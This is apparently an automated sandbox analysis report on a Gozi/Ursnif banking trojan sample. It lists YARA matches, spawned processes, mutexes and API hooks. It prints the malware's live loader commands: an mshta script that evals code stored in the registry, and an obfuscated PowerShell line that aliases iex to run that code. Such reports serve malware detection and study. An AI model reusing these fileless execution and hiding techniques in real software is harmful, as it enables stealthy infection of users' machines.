              Source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: C:\Windows\System32\control.exeCode function: 12_2_004963E012_2_004963E0
              Source: C:\Windows\System32\control.exeCode function: 12_2_0049D6F012_2_0049D6F0
              Source: C:\Windows\System32\control.exeCode function: 12_2_004A886812_2_004A8868
              Source: C:\Windows\System32\control.exeCode function: 12_2_0048887C12_2_0048887C
              Source: C:\Windows\System32\control.exeCode function: 12_2_0049887C12_2_0049887C
              Source: C:\Windows\System32\control.exeCode function: 12_2_004A901012_2_004A9010
              Source: C:\Windows\System32\control.exeCode function: 12_2_0048A89C12_2_0048A89C
              Source: C:\Windows\System32\control.exeCode function: 12_2_0048B14C12_2_0048B14C
              Source: C:\Windows\System32\control.exeCode function: 12_2_0049594C12_2_0049594C
              Source: C:\Windows\System32\control.exeCode function: 12_2_0049996C12_2_0049996C
              Source: C:\Windows\System32\control.exeCode function: 12_2_0048217812_2_00482178
              Source: C:\Windows\System32\control.exeCode function: 12_2_0049510812_2_00495108
              Source: C:\Windows\System32\control.exeCode function: 12_2_004929EC12_2_004929EC
              Source: C:\Windows\System32\control.exeCode function: 12_2_0049F26C12_2_0049F26C
              Source: C:\Windows\System32\control.exeCode function: 12_2_0049DA0412_2_0049DA04
              Source: C:\Windows\System32\control.exeCode function: 12_2_00494A1C12_2_00494A1C
              Source: C:\Windows\System32\control.exeCode function: 12_2_0048E2D412_2_0048E2D4
              Source: C:\Windows\System32\control.exeCode function: 12_2_0048D2F412_2_0048D2F4
              Source: C:\Windows\System32\control.exeCode function: 12_2_0048C34012_2_0048C340
              Source: C:\Windows\System32\control.exeCode function: 12_2_0049FBE812_2_0049FBE8
              Source: C:\Windows\System32\control.exeCode function: 12_2_004863F012_2_004863F0
              Source: C:\Windows\System32\control.exeCode function: 12_2_004833F412_2_004833F4
              Source: C:\Windows\System32\control.exeCode function: 12_2_00488BB012_2_00488BB0
              Source: C:\Windows\System32\control.exeCode function: 12_2_004983B412_2_004983B4
              Source: C:\Windows\System32\control.exeCode function: 12_2_00490C2812_2_00490C28
              Source: C:\Windows\System32\control.exeCode function: 12_2_0049748412_2_00497484
              Source: C:\Windows\System32\control.exeCode function: 12_2_004A749812_2_004A7498
              Source: C:\Windows\System32\control.exeCode function: 12_2_004A6D2012_2_004A6D20
              Source: C:\Windows\System32\control.exeCode function: 12_2_004A45A012_2_004A45A0
              Source: C:\Windows\System32\control.exeCode function: 12_2_004A1E4412_2_004A1E44
              Source: C:\Windows\System32\control.exeCode function: 12_2_004A466A12_2_004A466A
              Source: C:\Windows\System32\control.exeCode function: 12_2_00481E6412_2_00481E64
              Source: C:\Windows\System32\control.exeCode function: 12_2_004A860412_2_004A8604
              Source: C:\Windows\System32\control.exeCode function: 12_2_00499E1812_2_00499E18
              Source: C:\Windows\System32\control.exeCode function: 12_2_00492EC412_2_00492EC4
              Source: C:\Windows\System32\control.exeCode function: 12_2_0048B6DC12_2_0048B6DC
              Source: C:\Windows\System32\control.exeCode function: 12_2_004926E812_2_004926E8
              Source: C:\Windows\System32\control.exeCode function: 12_2_0049AEF812_2_0049AEF8
              Source: C:\Windows\System32\control.exeCode function: 12_2_004A469412_2_004A4694
              Source: C:\Windows\System32\control.exeCode function: 12_2_004846B012_2_004846B0
              Source: C:\Windows\System32\control.exeCode function: 12_2_00498F6812_2_00498F68
              Source: C:\Windows\System32\control.exeCode function: 12_2_004897E012_2_004897E0
              Source: C:\Windows\System32\control.exeCode function: 12_2_00493FF812_2_00493FF8
              Source: C:\Windows\System32\control.exeCode function: 12_2_004A0A50 NtQueryInformationProcess,12_2_004A0A50
              Source: C:\Windows\System32\control.exeCode function: 12_2_0049342C NtSetInformationProcess,12_2_0049342C
              Source: C:\Windows\System32\control.exeCode function: 12_2_00494E14 NtQueryInformationProcess,12_2_00494E14
              Source: C:\Windows\System32\control.exeCode function: 12_2_0049E6C4 NtQueryInformationToken,NtQueryInformationToken,NtClose,12_2_0049E6C4
              Source: C:\Windows\System32\control.exeCode function: 12_2_004BD002 NtProtectVirtualMemory,NtProtectVirtualMemory,12_2_004BD002
              Source: bf.exe, 00000000.00000003.676183930.0000000003FC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs bf.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: bf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: bf.exeVirustotal: Detection: 76%
              Source: bf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\bf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\bf.exe C:\Users\user\Desktop\bf.exe
              Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ffsw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ffsw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP"
              Source: C:\Users\user\Desktop\bf.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
              Source: C:\Users\user\Desktop\bf.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdlineJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdlineJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP"Jump to behavior
              Source: C:\Users\user\Desktop\bf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1sgyoy32.ak1.ps1Jump to behavior
              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@15/16@2/1
              Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
              Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{44FBAADD-D3CD-1679-7DB8-B7AA016CDB7E}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{203ACFCB-FFA6-5208-8954-A3A6CDC8873A}
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
              Source: C:\Users\user\Desktop\bf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\bf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: ntdll.pdb source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdlineJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdlineJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\n2sgiaoa.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\4rgoqrxw.dllJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Yara detected Ursnif
              Source: Yara matchFile source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
              Source: Yara matchFile source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Hooks registry keys query functions (used to hide registry keys)
              Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
              Modifies the prolog of user mode functions (user mode inline hooks)
              Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
              Modifies the export address table of user mode modules (user mode EAT hooks)
              Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA26CE521C
              Modifies the import address table of user mode modules (user mode IAT hooks)
              Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA26CE5200
              Source: C:\Users\user\Desktop\bf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\bf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
